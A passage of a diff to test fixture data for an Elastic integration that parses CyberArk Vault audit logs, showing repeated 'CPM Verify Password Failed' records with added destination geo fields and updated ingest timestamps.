\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:19:58\",\"IsoTimestamp\":\"2021-03-15T13:19:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814397\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -117,10 +126,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -204,7 +222,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). ", - "ingested": "2021-12-09T13:37:01.193602100Z", + "ingested": "2021-12-14T14:42:29.505124150Z", "original": "\u003c7\u003e1 2021-03-15T13:25:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814709\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserDN\\\" Value=\\\"ELASTIC.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:25:32\",\"IsoTimestamp\":\"2021-03-15T13:25:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814709\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"UserDN\",\"Value\":\"ELASTIC.local\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -228,10 +246,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -314,7 +341,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193608300Z", + "ingested": "2021-12-14T14:42:29.505124718Z", "original": "\u003c7\u003e1 2021-03-15T13:33:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615815206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:33:26\",\"IsoTimestamp\":\"2021-03-15T13:33:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615815206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -338,10 +365,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -425,7 +461,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193614100Z", + "ingested": "2021-12-14T14:42:29.505125097Z", "original": "\u003c7\u003e1 2021-03-15T15:04:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615820651\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:04:11\",\"IsoTimestamp\":\"2021-03-15T15:04:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615820651\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -449,10 +485,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -536,7 +581,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193619800Z", + "ingested": "2021-12-14T14:42:29.505125480Z", "original": "\u003c7\u003e1 2021-03-15T16:35:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615826099\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:35:01\",\"IsoTimestamp\":\"2021-03-15T16:35:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
